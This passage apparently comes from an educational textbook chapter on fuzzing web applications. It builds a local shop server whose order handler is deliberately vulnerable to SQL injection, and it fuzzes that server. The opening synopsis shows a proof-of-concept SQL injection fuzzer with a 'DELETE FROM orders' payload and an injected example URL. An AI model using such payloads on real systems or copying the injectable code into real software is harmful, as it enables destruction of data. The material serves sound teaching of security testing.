Using it for fuzzing yields a path with all form values filled; accessing this path acts like filling out and submitting the form.
```python
>>> web_form_fuzzer.fuzz()
'/order?item=lockset&name=%43+&email=+c%40_+c&city=%37b_4&zip=5&terms=on&submit='
```
Repeated calls to `WebFormFuzzer.fuzz()` invoke the form again and again, each time with different (fuzzed) values.
Internally, `WebFormFuzzer` builds on a helper class named `HTMLGrammarMiner`; you can extend its functionality to include more features.
### SQL Injection Attacks
`SQLInjectionFuzzer` is an experimental extension of `WebFormFuzzer` whose constructor takes an additional _payload_ – an SQL command to be injected and executed on the server. Otherwise, it is used like `WebFormFuzzer`:
```python
>>> sql_fuzzer = SQLInjectionFuzzer(httpd_url, "DELETE FROM orders")
>>> sql_fuzzer.fuzz()
"/order?item=lockset&name=+&email=0%404&city=+'+)%3b+DELETE+FROM+orders%3b+--&zip='+OR+1%3d1--'&terms=on&submit="
```
As you can see, the path to be retrieved contains the payload encoded into one of the form field values.
Internally, `SQLInjectionFuzzer` builds on a helper class named `SQLInjectionGrammarMiner`; you can extend its functionality to include more features.
`SQLInjectionFuzzer` is a proof-of-concept on how to build a malicious fuzzer; you should study and extend its code to make actual use of it.

## A Web User Interface
Let us start with a simple example. We want to set up a _Web server_ that allows readers of this book to buy fuzzingbook-branded fan articles ("swag"). In reality, we would make use of an existing Web shop (or an appropriate framework) for this purpose. For the purpose of this book, we _write our own Web server_, building on the HTTP server facilities provided by the Python library.
### Excursion: Implementing a Web Server
Our entire Web server is defined in an `HTTPRequestHandler` which, as the name suggests, handles arbitrary Web page requests.
```
from http.server import HTTPServer, BaseHTTPRequestHandler
from http.server import HTTPStatus # type: ignore
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
"""A simple HTTP server"""
pass
```
#### Taking Orders
For our Web server, we need a number of Web pages:
* We want one page where customers can place an order.
* We want one page where they see their order confirmed.
* Additionally, we need pages to display error messages such as "Page Not Found".
We start with the order form. The dictionary `FUZZINGBOOK_SWAG` holds the items that customers can order, together with long descriptions:
```
import bookutils
from typing import NoReturn, Tuple, Dict, List, Optional, Union
FUZZINGBOOK_SWAG = {
"tshirt": "One FuzzingBook T-Shirt",
"drill": "One FuzzingBook Rotary Hammer",
"lockset": "One FuzzingBook Lock Set"
}
```
This is the HTML code for the order form. The menu for selecting the swag to be ordered is created dynamically from `FUZZINGBOOK_SWAG`. We omit plenty of details such as precise shipping address, payment, shopping cart, and more.
```
HTML_ORDER_FORM = """
<html><body>
<form action="/order" style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
<strong id="title" style="font-size: x-large">Fuzzingbook Swag Order Form</strong>
<p>
Yes! Please send me at your earliest convenience
<select name="item">
"""
# (We don't use h2, h3, etc. here
# as they interfere with the notebook table of contents)
for item in FUZZINGBOOK_SWAG:
HTML_ORDER_FORM += \
'<option value="{item}">{name}</option>\n'.format(item=item,
name=FUZZINGBOOK_SWAG[item])
HTML_ORDER_FORM += """
</select>
<br>
<table>
<tr><td>
<label for="name">Name: </label><input type="text" name="name">
</td><td>
<label for="email">Email: </label><input type="email" name="email"><br>
</td></tr>
<tr><td>
<label for="city">City: </label><input type="text" name="city">
</td><td>
<label for="zip">ZIP Code: </label><input type="number" name="zip">
</td></tr>
</table>
<input type="checkbox" name="terms"><label for="terms">I have read
the <a href="/terms">terms and conditions</a></label>.<br>
<input type="submit" name="submit" value="Place order">
</p>
</form>
</body></html>
"""
```
This is what the order form looks like:
```
from IPython.display import display
from bookutils import HTML
HTML(HTML_ORDER_FORM)
```
This form is not yet functional, as there is no server behind it; pressing "place order" will lead you to a nonexistent page.
#### Order Confirmation
Once we have gotten an order, we show a confirmation page, which is instantiated with the customer information submitted before. Here is the HTML and the rendering:
```
HTML_ORDER_RECEIVED = """
<html><body>
<div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
<strong id="title" style="font-size: x-large">Thank you for your Fuzzingbook Order!</strong>
<p id="confirmation">
We will send <strong>{item_name}</strong> to {name} in {city}, {zip}<br>
A confirmation mail will be sent to {email}.
</p>
<p>
Want more swag? Use our <a href="/">order form</a>!
</p>
</div>
</body></html>
"""
HTML(HTML_ORDER_RECEIVED.format(item_name="One FuzzingBook Rotary Hammer",
name="Jane Doe",
email="doe@example.com",
city="Seattle",
zip="98104"))
```
#### Terms and Conditions
A Web site can only be complete if it has the necessary legalese. This page shows some terms and conditions.
```
HTML_TERMS_AND_CONDITIONS = """
<html><body>
<div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
<strong id="title" style="font-size: x-large">Fuzzingbook Terms and Conditions</strong>
<p>
The content of this project is licensed under the
<a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">Creative Commons
Attribution-NonCommercial-ShareAlike 4.0 International License.</a>
</p>
<p>
To place an order, use our <a href="/">order form</a>.
</p>
</div>
</body></html>
"""
HTML(HTML_TERMS_AND_CONDITIONS)
```
#### Storing Orders
To store orders, we make use of a *database*, stored in the file `orders.db`.
```
import sqlite3
import os
ORDERS_DB = "orders.db"
```
To interact with the database, we use *SQL commands*. The following commands create a table with five text columns for item, name, email, city, and zip – the exact same fields we also use in our HTML form.
```
def init_db():
if os.path.exists(ORDERS_DB):
os.remove(ORDERS_DB)
db_connection = sqlite3.connect(ORDERS_DB)
db_connection.execute("DROP TABLE IF EXISTS orders")
db_connection.execute("CREATE TABLE orders "
"(item text, name text, email text, "
"city text, zip text)")
db_connection.commit()
return db_connection
db = init_db()
```
At this point, the database is still empty:
```
print(db.execute("SELECT * FROM orders").fetchall())
```
We can add entries using the SQL `INSERT` command:
```
db.execute("INSERT INTO orders " +
"VALUES ('lockset', 'Walter White', "
"'white@jpwynne.edu', 'Albuquerque', '87101')")
db.commit()
```
These values are now in the database:
```
print(db.execute("SELECT * FROM orders").fetchall())
```
We can also delete entries from the table again (say, after completion of the order):
```
db.execute("DELETE FROM orders WHERE name = 'Walter White'")
db.commit()
print(db.execute("SELECT * FROM orders").fetchall())
```
#### Handling HTTP Requests
We have an order form and a database; now we need a Web server which brings it all together. The Python `http.server` module provides everything we need to build a simple HTTP server. An `HTTPRequestHandler` is an object that takes and processes HTTP requests – in particular, `GET` requests for retrieving Web pages.
We implement the `do_GET()` method that, based on the given path, branches off to serve the requested Web pages. Requesting the path `/` produces the order form; a path beginning with `/order` sends an order to be processed. All other requests end in a `Page Not Found` message.
```
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def do_GET(self):
try:
# print("GET " + self.path)
if self.path == "/":
self.send_order_form()
elif self.path.startswith("/order"):
self.handle_order()
elif self.path.startswith("/terms"):
self.send_terms_and_conditions()
else:
self.not_found()
except Exception:
self.internal_server_error()
```
##### Order Form
Accessing the home page (i.e. getting the page at `/`) is simple: We go and serve `HTML_ORDER_FORM` as defined above.
```
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def send_order_form(self):
self.send_response(HTTPStatus.OK, "Place your order")
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(HTML_ORDER_FORM.encode("utf8"))
```
Likewise, we can send out the terms and conditions:
```
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def send_terms_and_conditions(self):
self.send_response(HTTPStatus.OK, "Terms and Conditions")
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(HTML_TERMS_AND_CONDITIONS.encode("utf8"))
```
##### Processing Orders
When the user clicks `Submit` on the order form, the Web browser creates and retrieves a URL of the form
```
<hostname>/order?field_1=value_1&field_2=value_2&field_3=value_3
```
where each `field_i` is the name of the field in the HTML form, and `value_i` is the value provided by the user. Values use the CGI encoding we have seen in the [chapter on coverage](Coverage.ipynb) – that is, spaces are converted into `+`, and characters that are not digits or letters are converted into `%nn`, where `nn` is the hexadecimal value of the character.
If Jane Doe <doe@example.com> from Seattle orders a T-Shirt, this is the URL the browser creates:
```
<hostname>/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104
```
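The same encoding can be reproduced with the Python standard library; this sketch (not part of the server code) shows `urllib.parse.quote_plus()` producing exactly the transformation described above:

```python
from urllib.parse import quote_plus, unquote_plus

# Spaces become '+'; other non-alphanumeric characters become %nn hex escapes
assert quote_plus("Jane Doe") == "Jane+Doe"
assert quote_plus("doe@example.com") == "doe%40example.com"

# Decoding reverses the transformation
assert unquote_plus("doe%40example.com") == "doe@example.com"
print("CGI encoding round-trip works")
```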
When processing a query, the attribute `self.path` of the HTTP request handler holds the path accessed – i.e., everything after `<hostname>`. The helper method `get_field_values()` takes `self.path` and returns a dictionary of values.
```
import urllib.parse
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def get_field_values(self):
# Note: this fails to decode non-ASCII characters properly
query_string = urllib.parse.urlparse(self.path).query
# fields is { 'item': ['tshirt'], 'name': ['Jane Doe'], ...}
fields = urllib.parse.parse_qs(query_string, keep_blank_values=True)
values = {}
for key in fields:
values[key] = fields[key][0]
return values
```
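To see what `get_field_values()` computes, the `urllib.parse` calls it relies on can be tried out standalone; a minimal sketch with a made-up path:

```python
from urllib.parse import urlparse, parse_qs

path = "/order?item=tshirt&name=Jane+Doe&email=doe%40example.com"
query_string = urlparse(path).query

# parse_qs maps each field to a *list* of values, already CGI-decoded
fields = parse_qs(query_string, keep_blank_values=True)
print(fields)  # {'item': ['tshirt'], 'name': ['Jane Doe'], 'email': ['doe@example.com']}

# get_field_values() then keeps only the first value of each field
values = {key: fields[key][0] for key in fields}
print(values['name'])  # Jane Doe
```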
The method `handle_order()` takes these values from the URL, stores the order, and returns a page confirming the order. If anything goes wrong, it sends an internal server error.
```
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def handle_order(self):
values = self.get_field_values()
self.store_order(values)
self.send_order_received(values)
```
Storing the order makes use of the database connection defined above; we create an SQL command instantiated with the values as extracted from the URL.
```
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def store_order(self, values):
db = sqlite3.connect(ORDERS_DB)
# The following should be one line
sql_command = "INSERT INTO orders VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values)
self.log_message("%s", sql_command)
db.executescript(sql_command)
db.commit()
```
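As an aside, the format-string construction above is exactly what will make this server vulnerable to the SQL injection attacks explored later in this chapter. For contrast, here is a sketch of the standard defense, `sqlite3` placeholders, run against a throwaway in-memory database (the sample values are made up):

```python
import sqlite3

# Parameterized variant of store_order(): '?' placeholders ensure user input
# is always treated as data, never interpreted as SQL code.
mem_db = sqlite3.connect(":memory:")
mem_db.execute("CREATE TABLE orders "
               "(item text, name text, email text, city text, zip text)")

values = {'item': 'tshirt', 'name': "Robert'); DROP TABLE orders; --",
          'email': 'bob@example.com', 'city': 'Seattle', 'zip': '98104'}
mem_db.execute("INSERT INTO orders VALUES (?, ?, ?, ?, ?)",
               (values['item'], values['name'], values['email'],
                values['city'], values['zip']))
mem_db.commit()

# The malicious 'name' is stored verbatim; the orders table survives intact
print(mem_db.execute("SELECT name FROM orders").fetchall())
```

The chapter keeps the vulnerable version on purpose, so that the fuzzers below have something to find.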
After storing the order, we send the confirmation HTML page, which again is instantiated with the values from the URL.
```
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def send_order_received(self, values):
# Should use html.escape()
values["item_name"] = FUZZINGBOOK_SWAG[values["item"]]
confirmation = HTML_ORDER_RECEIVED.format(**values).encode("utf8")
self.send_response(HTTPStatus.OK, "Order received")
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(confirmation)
```
##### Other HTTP commands
Besides the `GET` command (which does all the heavy lifting), HTTP servers can also support other HTTP commands; we support the `HEAD` command, which returns the head information of a Web page. In our case, this is always empty.
```
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def do_HEAD(self):
# print("HEAD " + self.path)
self.send_response(HTTPStatus.OK)
self.send_header("Content-type", "text/html")
self.end_headers()
```
#### Error Handling
We have defined pages for submitting and processing orders; now we also need a few pages for errors that might occur.
##### Page Not Found
This page is displayed if a non-existing page (i.e. anything except `/` or `/order`) is requested.
```
HTML_NOT_FOUND = """
<html><body>
<div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
<strong id="title" style="font-size: x-large">Sorry.</strong>
<p>
This page does not exist. Try our <a href="/">order form</a> instead.
</p>
</div>
</body></html>
"""
HTML(HTML_NOT_FOUND)
```
The method `not_found()` takes care of sending this out with the appropriate HTTP status code.
```
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def not_found(self):
self.send_response(HTTPStatus.NOT_FOUND, "Not found")
self.send_header("Content-type", "text/html")
self.end_headers()
message = HTML_NOT_FOUND
self.wfile.write(message.encode("utf8"))
```
##### Internal Errors
This page is shown for any internal errors that might occur. For diagnostic purposes, we have it include the traceback of the failing function.
```
HTML_INTERNAL_SERVER_ERROR = """
<html><body>
<div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
<strong id="title" style="font-size: x-large">Internal Server Error</strong>
<p>
The server has encountered an internal error. Go to our <a href="/">order form</a>.
<pre>{error_message}</pre>
</p>
</div>
</body></html>
"""
HTML(HTML_INTERNAL_SERVER_ERROR)
import sys
import traceback
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def internal_server_error(self):
self.send_response(HTTPStatus.INTERNAL_SERVER_ERROR, "Internal Error")
self.send_header("Content-type", "text/html")
self.end_headers()
exc = traceback.format_exc()
self.log_message("%s", exc.strip())
message = HTML_INTERNAL_SERVER_ERROR.format(error_message=exc)
self.wfile.write(message.encode("utf8"))
```
#### Logging
Our server runs as a separate process in the background, waiting to receive commands at all times. To see what it is doing, we implement a special logging mechanism. The `httpd_message_queue` establishes a queue into which one process (the server) can store Python objects, and from which another process (the notebook) can retrieve them. We use this to pass log messages from the server, which we can then display in the notebook.
For multiprocessing, we use the `multiprocess` module - a variant of the standard Python `multiprocessing` module that also works in notebooks. If you are running this code outside of a notebook, you can also use `multiprocessing` instead.
```
from multiprocess import Queue # type: ignore
HTTPD_MESSAGE_QUEUE = Queue()
```
Let us place two messages in the queue:
```
HTTPD_MESSAGE_QUEUE.put("I am another message")
HTTPD_MESSAGE_QUEUE.put("I am one more message")
```
To distinguish server messages from other parts of the notebook, we format them specially:
```
from bookutils import rich_output, terminal_escape
def display_httpd_message(message: str) -> None:
if rich_output():
display(
HTML(
'<pre style="background: NavajoWhite;">' +
message +
"</pre>"))
else:
print(terminal_escape(message))
display_httpd_message("I am a httpd server message")
```
The method `print_httpd_messages()` prints all messages accumulated in the queue so far:
```
def print_httpd_messages():
while not HTTPD_MESSAGE_QUEUE.empty():
message = HTTPD_MESSAGE_QUEUE.get()
display_httpd_message(message)
import time
time.sleep(1)
print_httpd_messages()
```
With `clear_httpd_messages()`, we can silently discard all pending messages:
```
def clear_httpd_messages() -> None:
while not HTTPD_MESSAGE_QUEUE.empty():
HTTPD_MESSAGE_QUEUE.get()
```
The method `log_message()` in the request handler makes use of the queue to store its messages:
```
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def log_message(self, format: str, *args) -> None:
message = ("%s - - [%s] %s\n" %
(self.address_string(),
self.log_date_time_string(),
format % args))
HTTPD_MESSAGE_QUEUE.put(message)
```
In [the chapter on carving](Carver.ipynb), we had introduced a `webbrowser()` method which retrieves the contents of the given URL. We now extend it such that it also prints out any log messages produced by the server:
```
import requests
def webbrowser(url: str, mute: bool = False) -> str:
"""Download and return the http/https resource given by the URL"""
try:
r = requests.get(url)
contents = r.text
finally:
if not mute:
print_httpd_messages()
else:
clear_httpd_messages()
return contents
```
With `webbrowser()`, we are now ready to get the Web server up and running.
### End of Excursion
### Running the Server
We run the server on the *local host* – that is, the same machine which also runs this notebook. We check for an accessible port and put the resulting URL in the queue created earlier.
```
def run_httpd_forever(handler_class: type) -> NoReturn: # type: ignore
host = "127.0.0.1" # localhost IP
for port in range(8800, 9000):
httpd_address = (host, port)
try:
httpd = HTTPServer(httpd_address, handler_class)
break
except OSError:
continue
httpd_url = "http://" + host + ":" + repr(port)
HTTPD_MESSAGE_QUEUE.put(httpd_url)
httpd.serve_forever()
```
The function `start_httpd()` starts the server in a separate process, which we start using the `multiprocess` module. It retrieves its URL from the message queue and returns it, such that we can start talking to the server.
```
from multiprocess import Process
def start_httpd(handler_class: type = SimpleHTTPRequestHandler) \
-> Tuple[Process, str]:
clear_httpd_messages()
httpd_process = Process(target=run_httpd_forever, args=(handler_class,))
httpd_process.start()
httpd_url = HTTPD_MESSAGE_QUEUE.get()
return httpd_process, httpd_url
```
Let us now start the server and save its URL:
```
httpd_process, httpd_url = start_httpd()
httpd_url
```
### Interacting with the Server
Let us now access the server just created.
#### Direct Browser Access
If you are running the Jupyter notebook server on the local host as well, you can now access the server directly at the given URL. Simply open the address in `httpd_url` by clicking on the link below.
**Note**: This only works if you are running the Jupyter notebook server on the local host.
```
def print_url(url: str) -> None:
if rich_output():
display(HTML('<pre><a href="%s">%s</a></pre>' % (url, url)))
else:
print(terminal_escape(url))
print_url(httpd_url)
```
Even more convenient, you may be able to interact directly with the server using the window below.
**Note**: This only works if you are running the Jupyter notebook server on the local host.
```
from IPython.display import IFrame
IFrame(httpd_url, '100%', 230)
```
After interaction, you can retrieve the messages produced by the server:
```
print_httpd_messages()
```
We can also see any orders placed in the `orders` database (`db`):
```
print(db.execute("SELECT * FROM orders").fetchall())
```
And we can clear the order database:
```
db.execute("DELETE FROM orders")
db.commit()
```
#### Retrieving the Home Page
Even if our browser cannot directly interact with the server, the _notebook_ can. We can, for instance, retrieve the contents of the home page and display them:
```
contents = webbrowser(httpd_url)
HTML(contents)
```
#### Placing Orders
To test this form, we can generate URLs with orders and have the server process them.
The method `urljoin()` puts together a base URL (i.e., the URL of our server) and a path – say, the path towards our order.
```
from urllib.parse import urljoin, urlsplit
urljoin(httpd_url, "/order?foo=bar")
```
With `urljoin()`, we can create a full URL that is the same as the one generated by the browser as we submit the order form. Sending this URL to the browser effectively places the order, as we can see in the server log produced:
```
contents = webbrowser(urljoin(httpd_url,
"/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104"))
```
The web page returned confirms the order:
```
HTML(contents)
```
And the order is in the database, too:
```
print(db.execute("SELECT * FROM orders").fetchall())
```
#### Error Messages
We can also test whether the server correctly responds to invalid requests. Nonexistent pages, for instance, are correctly handled:
```
HTML(webbrowser(urljoin(httpd_url, "/some/other/path")))
```
You may remember we also have a page for internal server errors. Can we get the server to produce this page? To find this out, we have to test the server thoroughly – which we do in the remainder of this chapter.
## Fuzzing Input Forms
After setting up and starting the server, let us now go and systematically test it – first with expected, and then with less expected values.
### Fuzzing with Expected Values
Since placing orders is all done by creating appropriate URLs, we define a [grammar](Grammars.ipynb) `ORDER_GRAMMAR` which encodes ordering URLs. It comes with a few sample values for names, email addresses, cities and (random) digits.
#### Excursion: Implementing cgi_encode()
To make it easier to define strings that become part of a URL, we define the function `cgi_encode()`, taking a string and automatically encoding it into CGI format:
```
import string
def cgi_encode(s: str, do_not_encode: str = "") -> str:
ret = ""
for c in s:
if (c in string.ascii_letters or c in string.digits
or c in "$-_.+!*'()," or c in do_not_encode):
ret += c
elif c == ' ':
ret += '+'
else:
ret += "%%%02x" % ord(c)
return ret
s = cgi_encode('Is "DOW30" down .24%?')
s
```
The optional parameter `do_not_encode` allows us to skip certain characters from encoding. This is useful when encoding grammar rules:
```
cgi_encode("<string>@<string>", "<>")
```
`cgi_encode()` is the exact counterpart of the `cgi_decode()` function defined in the [chapter on coverage](Coverage.ipynb):
```
from Coverage import cgi_decode # minor dependency
cgi_decode(s)
```
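To illustrate the correspondence without importing the `Coverage` module, here is a minimal stand-alone decoder; round-tripping a string through the encoder and decoder recovers the original. (Note the encoder leaves a literal `+` untouched, so the round trip only holds for inputs without `+`.)

```python
import string

def cgi_encode_(s: str, do_not_encode: str = "") -> str:
    # Same logic as cgi_encode() above, repeated so this snippet runs standalone
    ret = ""
    for c in s:
        if (c in string.ascii_letters or c in string.digits
                or c in "$-_.+!*'()," or c in do_not_encode):
            ret += c
        elif c == ' ':
            ret += '+'
        else:
            ret += "%%%02x" % ord(c)
    return ret

def cgi_decode_(s: str) -> str:
    # Minimal decoder: '+' becomes a space; '%xx' becomes chr(0xXX)
    ret, i = "", 0
    while i < len(s):
        if s[i] == '+':
            ret += ' '
        elif s[i] == '%':
            ret += chr(int(s[i + 1:i + 3], 16))
            i += 2
        else:
            ret += s[i]
        i += 1
    return ret

original = 'Is "DOW30" down .24%?'
assert cgi_decode_(cgi_encode_(original)) == original
```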
#### End of Excursion
In the grammar, we make use of `cgi_encode()` to encode strings:
```
from Grammars import crange, is_valid_grammar, syntax_diagram, Grammar
ORDER_GRAMMAR: Grammar = {
"<start>": ["<order>"],
"<order>": ["/order?item=<item>&name=<name>&email=<email>&city=<city>&zip=<zip>"],
"<item>": ["tshirt", "drill", "lockset"],
"<name>": [cgi_encode("Jane Doe"), cgi_encode("John Smith")],
"<email>": [cgi_encode("j.doe@example.com"), cgi_encode("j_smith@example.com")],
"<city>": ["Seattle", cgi_encode("New York")],
"<zip>": ["<digit>" * 5],
"<digit>": crange('0', '9')
}
assert is_valid_grammar(ORDER_GRAMMAR)
syntax_diagram(ORDER_GRAMMAR)
```
Using [one of our grammar fuzzers](GrammarFuzzer.ipynb), we can instantiate this grammar and generate URLs:
```
from GrammarFuzzer import GrammarFuzzer
order_fuzzer = GrammarFuzzer(ORDER_GRAMMAR)
[order_fuzzer.fuzz() for i in range(5)]
```
Sending these URLs to the server will have them processed correctly:
```
HTML(webbrowser(urljoin(httpd_url, order_fuzzer.fuzz())))
print(db.execute("SELECT * FROM orders").fetchall())
```
### Fuzzing with Unexpected Values
We can now see that the server does a good job when faced with "standard" values. But what happens if we feed it non-standard values? To this end, we make use of a [mutation fuzzer](MutationFuzzer.ipynb) which inserts random changes into the URL. Our seed (i.e. the value to be mutated) comes from the grammar fuzzer:
```
seed = order_fuzzer.fuzz()
seed
```
Mutating this string yields mutations not only in the field values, but also in field names as well as the URL structure.
```
from MutationFuzzer import MutationFuzzer # minor dependency
mutate_order_fuzzer = MutationFuzzer([seed], min_mutations=1, max_mutations=1)
[mutate_order_fuzzer.fuzz() for i in range(5)]
```
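Under the hood, a mutation fuzzer applies simple character-level operations to the seed. Here is a minimal sketch of the idea (not the actual `MutationFuzzer` implementation):

```python
import random

def mutate(s: str) -> str:
    """Return s with one random character deleted, inserted, or replaced."""
    pos = random.randrange(len(s))
    random_char = chr(random.randrange(32, 127))  # printable ASCII
    op = random.choice(["delete", "insert", "replace"])
    if op == "delete":
        return s[:pos] + s[pos + 1:]
    if op == "insert":
        return s[:pos] + random_char + s[pos:]
    return s[:pos] + random_char + s[pos + 1:]

seed_ = "/order?item=tshirt&name=Jane+Doe"
mutants = [mutate(seed_) for _ in range(5)]
# Each mutant differs from the seed by at most one character in length
assert all(abs(len(m) - len(seed_)) <= 1 for m in mutants)
```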
Let us fuzz a little until we get an internal server error. We use the Python `requests` module to interact with the Web server such that we can directly access the HTTP status code.
```
import requests
from http import HTTPStatus

while True:
    path = mutate_order_fuzzer.fuzz()
    url = urljoin(httpd_url, path)
    r = requests.get(url)
    if r.status_code == HTTPStatus.INTERNAL_SERVER_ERROR:
        break
```
That didn't take long. Here's the offending URL:
```
url
clear_httpd_messages()
HTML(webbrowser(url))
```
How does the URL cause this internal error? We make use of [delta debugging](Reducer.ipynb) to minimize the failure-inducing path, setting up a `WebRunner` class to define the failure condition:
```
failing_path = path
failing_path
from Fuzzer import Runner
class WebRunner(Runner):
"""Runner for a Web server"""
def __init__(self, base_url: Optional[str] = None):
self.base_url = base_url
def run(self, url: str) -> Tuple[str, str]:
if self.base_url is not None:
url = urljoin(self.base_url, url)
import requests # for imports
r = requests.get(url)
if r.status_code == HTTPStatus.OK:
return url, Runner.PASS
elif r.status_code == HTTPStatus.INTERNAL_SERVER_ERROR:
return url, Runner.FAIL
else:
return url, Runner.UNRESOLVED
web_runner = WebRunner(httpd_url)
web_runner.run(failing_path)
```
This is the minimized path:
```
from Reducer import DeltaDebuggingReducer # minor dependency
minimized_path = DeltaDebuggingReducer(web_runner).reduce(failing_path)
minimized_path
```
It turns out that our server encounters an internal error if we do not supply the requested fields:
```
minimized_url = urljoin(httpd_url, minimized_path)
minimized_url
clear_httpd_messages()
HTML(webbrowser(minimized_url))
```
We see that we might have a lot to do to make our Web server more robust against unexpected inputs. The [exercises](#Exercises) give some instructions on what to do.
## Extracting Grammars for Input Forms
In our previous examples, we have assumed that we have a grammar that produces valid (or less valid) order queries. However, such a grammar does not need to be specified manually; we can also _extract it automatically_ from a Web page at hand. This way, we can apply our test generators on arbitrary Web forms without a manual specification step.
### Searching HTML for Input Fields
The key idea of our approach is to identify all input fields in a form. To this end, let us take a look at how the individual elements in our order form are encoded in HTML:
```
html_text = webbrowser(httpd_url)
print(html_text[html_text.find("<form"):html_text.find("</form>") + len("</form>")])
```
We see that there are a number of form elements that accept inputs, in particular `<input>`, but also `<select>` and `<option>`. The idea now is to _parse_ the HTML of the Web page in question, to extract these individual input elements, and then to create a _grammar_ that produces a matching URL, effectively filling out the form.
To parse the HTML page, we could define a grammar to parse HTML and make use of [our own parser infrastructure](Parser.ipynb). However, it is much easier to not reinvent the wheel and instead build on the existing, dedicated `HTMLParser` class from the Python standard library.
```
from html.parser import HTMLParser
```
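As a quick demonstration of how `HTMLParser` reports tags and attributes, here is a tiny subclass applied to a made-up HTML fragment:

```python
from html.parser import HTMLParser

class DemoParser(HTMLParser):
    """Collect all start tags and their attributes"""
    def __init__(self):
        super().__init__()
        self.seen = []

    def handle_starttag(self, tag, attrs):
        # attrs is a list of (name, value) pairs
        self.seen.append((tag, dict(attrs)))

demo = DemoParser()
demo.feed('<form action="/order"><input type="text" name="name"></form>')
assert demo.seen[0] == ("form", {"action": "/order"})
assert demo.seen[1] == ("input", {"type": "text", "name": "name"})
```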
During parsing, we search for `<form>` tags and save the associated action (i.e., the URL to be invoked when the form is submitted) in the `action` attribute. While processing the form, we create a map `fields` that holds all input fields we have seen; it maps field names to the respective HTML input types (`"text"`, `"number"`, `"checkbox"`, etc.). Exclusive selection options map to a list of possible values; the `select` stack holds the currently active selection.
```
class FormHTMLParser(HTMLParser):
"""A parser for HTML forms"""
def reset(self) -> None:
super().reset()
# Form action attribute (a URL)
self.action = ""
# Map of field name to type
# (or selection name to [option_1, option_2, ...])
self.fields: Dict[str, List[str]] = {}
# Stack of currently active selection names
self.select: List[str] = []
```
While parsing, the parser calls `handle_starttag()` for every opening tag (such as `<form>`) found; conversely, it invokes `handle_endtag()` for closing tags (such as `</form>`). `attributes` gives us a map of associated attributes and values.
Here is how we process the individual tags:
* When we find a `<form>` tag, we save the associated action in the `action` attribute;
* When we find an `<input>` tag or similar, we save the type in the `fields` attribute;
* When we find a `<select>` tag or similar, we push its name on the `select` stack;
* When we find an `<option>` tag, we append the option to the list associated with the last pushed `<select>` tag.
```
class FormHTMLParser(FormHTMLParser):
def handle_starttag(self, tag, attrs):
attributes = {attr_name: attr_value for attr_name, attr_value in attrs}
# print(tag, attributes)
if tag == "form":
self.action = attributes.get("action", "")
elif tag == "select" or tag == "datalist":
if "name" in attributes:
name = attributes["name"]
self.fields[name] = []
self.select.append(name)
else:
self.select.append(None)
elif tag == "option" and "multiple" not in attributes:
current_select_name = self.select[-1]
if current_select_name is not None and "value" in attributes:
self.fields[current_select_name].append(attributes["value"])
elif tag == "input" or tag == "option" or tag == "textarea":
if "name" in attributes:
name = attributes["name"]
self.fields[name] = attributes.get("type", "text")
elif tag == "button":
if "name" in attributes:
name = attributes["name"]
self.fields[name] = [""]
class FormHTMLParser(FormHTMLParser):
def handle_endtag(self, tag):
if tag == "select":
self.select.pop()
```
Our implementation handles only one form per Web page; it also works on HTML only, ignoring all interaction coming from JavaScript. Also, it does not support all HTML input types.
Let us put this parser to action. We create a class `HTMLGrammarMiner` that takes an HTML document to parse. It then returns the associated action and the associated fields:
```
class HTMLGrammarMiner:
"""Mine a grammar from a HTML form"""
def __init__(self, html_text: str) -> None:
"""Constructor. `html_text` is the HTML string to parse."""
html_parser = FormHTMLParser()
html_parser.feed(html_text)
self.fields = html_parser.fields
self.action = html_parser.action
```
Applied on our order form, this is what we get:
```
html_miner = HTMLGrammarMiner(html_text)
html_miner.action
html_miner.fields
```
From this structure, we can now generate a grammar that automatically produces valid form submission URLs.
### Mining Grammars for Web Pages
To create a grammar from the fields extracted from HTML, we build on the `CGI_GRAMMAR` defined in the [chapter on grammars](Grammars.ipynb). The key idea is to define rules for every HTML input type: An HTML `number` type will get values from the `<number>` rule; likewise, values for the HTML `email` type will be defined from the `<email>` rule. Our default grammar provides very simple rules for these types.
```
from Grammars import crange, srange, new_symbol, unreachable_nonterminals, CGI_GRAMMAR, extend_grammar
class HTMLGrammarMiner(HTMLGrammarMiner):
QUERY_GRAMMAR: Grammar = extend_grammar(CGI_GRAMMAR, {
"<start>": ["<action>?<query>"],
"<text>": ["<string>"],
"<number>": ["<digits>"],
"<digits>": ["<digit>", "<digits><digit>"],
"<digit>": crange('0', '9'),
"<checkbox>": ["<_checkbox>"],
"<_checkbox>": ["on", "off"],
"<email>": ["<_email>"],
"<_email>": [cgi_encode("<string>@<string>", "<>")],
# Use a fixed password in case we need to repeat it
"<password>": ["<_password>"],
"<_password>": ["abcABC.123"],
# Stick to printable characters to avoid logging problems
"<percent>": ["%<hexdigit-1><hexdigit>"],
"<hexdigit-1>": srange("34567"),
# Submissions:
"<submit>": [""]
})
```
Our grammar miner now takes the fields extracted from HTML, converting them into rules. Essentially, every input field encountered gets included in the resulting query URL; and it gets a rule expanding it into the appropriate type.
```
class HTMLGrammarMiner(HTMLGrammarMiner):
def mine_grammar(self) -> Grammar:
"""Extract a grammar from the given HTML text"""
